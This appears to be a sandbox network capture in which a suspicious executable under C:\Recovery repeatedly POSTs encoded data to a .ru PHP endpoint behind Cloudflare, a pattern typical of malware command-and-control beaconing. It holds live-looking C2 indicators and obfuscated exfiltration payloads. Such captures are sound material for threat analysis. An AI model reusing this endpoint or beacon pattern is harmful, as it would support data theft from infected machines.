Dec 6, 2024 03:14:54.475308895 CET	810	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d3guUyOHvY4XpOEQTweBfcCFv2ptNv3syXQFcU%2FDNQ5oyiJ9BaUonQphF7biLb4M70i4tCQx%2FiWph%2FgGnqXFA48uGHVFPc3MlD3GmJcsxw97hDUP%2Fn0Dk1nZ9y4a7XURlnEIPWY2LJ0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3dbead51895-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3143&min_rtt=1592&rtt_var=3699&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=104270&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.6	50110	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:54.713608980 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:55.061069965 CET	1012	OUT	Data Raw: 56 54 5a 5a 59 59 56 5f 5c 56 52 5a 50 5f 5a 57 58 58 5b 5a 50 5a 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VTZZYYV_\VRZP_ZWXX[ZPZVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C=#.*'R(5 &;2%7T$+&=3762:#8/']/!Q!4
Dec 6, 2024 03:14:55.796034098 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:56.031579018 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bA9aSBPbYwyNkYngaQpCAzEGJUzib7NODpYtfuCregDgpjeeOVJu9%2BkNNCK6%2FdjON7kxQe7nDQb189zTYXKuQwVLMOS4PTQsmntQwqPE4rVP03enbIuup5Zs61lBY9FxS3%2FfgtyYCV4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3e5cb1c42a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4264&min_rtt=1762&rtt_var=5665&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=67030&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.6	50111	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:56.277611971 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:56.625611067 CET	1012	OUT	Data Raw: 53 51 5f 51 5c 5a 56 5b 5c 56 52 5a 50 5f 5a 5c 58 59 5b 5d 50 54 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQ_Q\ZV[\VRZP_Z\XY[]PTV_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>">;R?S?Z%+9&3R'+!)(#/!'*/Y"88;=']/!Q!4
Dec 6, 2024 03:14:57.388420105 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:57.627269983 CET	816	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6RdM4byYw%2B9QxoGB8fObN1bXvp27nk%2FQ5envsCNFTUl7zA6%2F%2F1Eyc3lRy%2B8YbLu8yHgbYK2Ck5DJxrS3gt3gDGn7AEK%2F5Xf1%2FCic7wYe6Nwvr53gZp0i7LwIFwNAR6OYBAWu7uuFr4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3efb8797ca5-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=9719&min_rtt=3314&rtt_var=14053&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=26761&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.6	50112	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:57.868259907 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:58.217608929 CET	1012	OUT	Data Raw: 56 53 5f 5c 59 51 56 5b 5c 56 52 5a 50 5d 5a 54 58 59 5b 58 50 59 56 58 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VS_\YQV[\VRZP]ZTXY[XPYVXZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C#.?!8>%#^1-1,'U'[><4,-W&/"++;-']/!Q!
Dec 6, 2024 03:14:58.965641022 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:59.217875004 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sk2ZESB1SIUuI23st%2FCdBYdakDW%2FDTcKeVyC2GRrchriIwooOY3hFMGcDinKxvnjmcUtQ5oFHhbTuN%2BuCO%2FePAEzJVL9enGQoM8Ha0R44yNfVZ6KfIHQ0EIl647ITny0O44yZsMP6oU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3f99b79424b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7170&min_rtt=4666&rtt_var=6758&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=59104&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.6	50114	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:59.495119095 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:59.842248917 CET	1296	OUT	Data Raw: 56 50 5f 5f 5c 5c 56 5f 5c 56 52 5a 50 52 5a 5c 58 5d 5b 5e 50 5d 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP__\\V_\VRZPRZ\X][^P]V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E>3"*"+T+52+-&? ']2Z=.$ /&3X6#/']/!Q!
Dec 6, 2024 03:15:00.642795086 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:00.946414948 CET	961	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cDKuXDNegC9jwxO2e3a9t8lsswo30bx9OrV1BvngQM8ERKeDnu%2BZ5K9KC1CHXLHf9Xa2G44V1VEIDskstejWLGGAzNyGpJ9IkD44JfmSt6WbQsQN%2FLT%2FhWj8wsNz0jMJeLPUWVD5S%2B4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c4040c55c477-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=27894&min_rtt=24757&rtt_var=15558&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=29286&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 12 33 04 3f 00 21 0c 37 00 3a 10 20 56 32 3d 3d 5d 2e 06 30 5c 22 3b 17 14 29 2f 20 51 24 34 09 1b 3e 12 0b 13 28 59 27 56 29 38 23 5b 00 13 26 16 29 03 2a 1b 28 39 20 17 31 0a 3e 5f 28 25 26 5c 3e 10 05 57 21 2a 0f 5e 22 13 3c 18 30 03 2f 53 2c 43 37 06 28 27 0c 1b 32 0e 21 5e 0e 11 39 57 31 0d 2e 12 20 16 27 51 26 0e 3b 07 28 2a 38 5f 27 2f 02 09 3f 27 20 1e 27 08 3d 10 26 2c 23 0f 31 03 22 5f 34 3c 23 57 2d 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%3?!7: V2==].0\";)/ Q$4>(Y'V)8#[&)(9 1>_(%&\>W!^"<0/S,C7('2!^9W1. 'Q&;(*8_'/?' '=&,#1"_4<#W-<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.6	50115	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:59.621184111 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:59.967325926 CET	1008	OUT	Data Raw: 53 53 5a 5d 59 5f 56 58 5c 56 52 5a 50 5a 5a 5c 58 5e 5b 57 50 5c 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZ]Y_VX\VRZPZZ\X^[WP\V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E* 1\>2(+2(9&Z$%;>>( 5T%)/^!+W/-']/!Q!
Dec 6, 2024 03:15:00.751444101 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:01.008456945 CET	801	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdk19RlJxQl3F6jthWJluCieWQImXmHQmGJgW5SEJ5inFrtt1UGL4HPyAiFR6hPHTAvwGcUWpBT6s8MJpkGO13iU5SvJcDFKieKAaBVVSbkokXii8Hk7mlReJLP53Jvbg5Zqae7oKco%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c404bd5143a5-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3854&min_rtt=1643&rtt_var=5040&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=75499&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.6	50117	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:01.255446911 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue
Dec 6, 2024 03:15:01.607878923 CET	1008	OUT	Data Raw: 56 56 5f 5b 59 5f 53 5c 5c 56 52 5a 50 5a 5a 55 58 5f 5b 5c 50 5d 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VV_[Y_S\\VRZPZZUX_[\P]V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!= [>1'S<S#&8)T&,;V%(2[(>4,!T'9'_!(/-']/!Q!$
Dec 6, 2024 03:15:02.360794067 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:02.655102968 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S1jzVWNr3sdYq5Xx%2FjJEWVN%2FKbglUzTH2Ctq0JSZVXtBsXgAhad7myWIY5sWqrjpvPSDzh4ipRF6tLfJ1W9cQn%2Frvu4F1UPNznUuoTlW2SxY4SJ8AZm0UJG4E0hqr1LCxvI8ByiNNGY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c40ece334406-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3860&min_rtt=1676&rtt_var=4997&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1281&delivery_rate=76232&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.6	50118	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:02.899712086 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:03.251220942 CET	1012	OUT	Data Raw: 56 5f 5f 5f 5c 5a 56 5b 5c 56 52 5a 50 5e 5a 51 58 5f 5b 5f 50 5b 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V___\ZV[\VRZP^ZQX_[_P[VYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP")0.*2/V('(1R%;V%+))-?#R1,5^#8']/!Q!0
Dec 6, 2024 03:15:03.984781027 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:04.241156101 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sz8iZpBkfJzkynp3ZRq4tyMeJQl4MnOKVG5O3H8ztKyLzxWqxvg1%2B6LpYQDeWGCaoTA5qY8lwZ%2Bf5MgmB37cAFPcFokBbo1wlksz1HqMJZjNqyYnbF%2FFQ2pdkriOxFEdG2H0lnSGsJg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c418ebbef791-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3962&min_rtt=1626&rtt_var=5283&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=71846&cwnd=116&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.6	50119	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:04.473221064 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:04.828944921 CET	1012	OUT	Data Raw: 56 56 5f 59 59 51 56 53 5c 56 52 5a 50 5b 5a 57 58 5a 5b 58 50 59 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VV_YYQVS\VRZP[ZWXZ[XPYVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E=0Y?"$<;Z1&(0X(.4#-23!^?T/=']/!Q!$
Dec 6, 2024 03:15:05.558562994 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:05.836740971 CET	812	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pTy%2FHCar%2Bd6h3sl5TNNkOlyx1xj1AlFEYQEg78QsnsVVENLClxSnkZvHj1mjQfJKSizjbF0tGQ%2Fuz1SX7Uykv%2FLR3ZFLjLYUoXf2YPs4rkgoDD8T%2BF1Ig2cF3m81JZHBjuNBG8ulK7E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c422cfef32d9-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8592&min_rtt=1803&rtt_var=14254&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=26017&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.6	50121	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:06.092092991 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:15:06.436270952 CET	1012	OUT	Data Raw: 53 52 5f 5d 5c 5f 53 58 5c 56 52 5a 50 53 5a 57 58 5d 5b 56 50 54 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_]\_SX\VRZPSZWX][VPTV]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"( Y*2(811U2?<'+9>+7')868;S8']/!Q!
Dec 6, 2024 03:15:07.186650991 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:15:07.467648983 CET	807	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k3k3QiWDa9UlvZxpdHi1AaXzKercotM5YMAaOP9%2BzV9PMuyknDQiwwIGWIkA%2Ff2DgA5aRHnAF%2Fwx8P4tSkiDZyqOtUMlVRxo97xSAHZYI83AvZFeZK4SMNIfYgpUbUtsgIrbteeG4x8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c42cfb9e4219-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1731&rtt_var=5630&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=67424&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.6	50122	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:15:07.709692001 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:15:08.061248064 CET	1012	OUT	Data Raw: 53 53 5a 59 59 58 53 5e 5c 56 52 5a 50 5d 5a 5c 58 5f 5b 5d 50 54 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZYYXS^\VRZP]Z\X_[]PTVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!==Z",<%+\&:1??W%82>+#'5W;-']/!Q!
Dec 6, 2024 03:15:08.796869040 CET	25	IN	HTTP/1.1 100 Continue
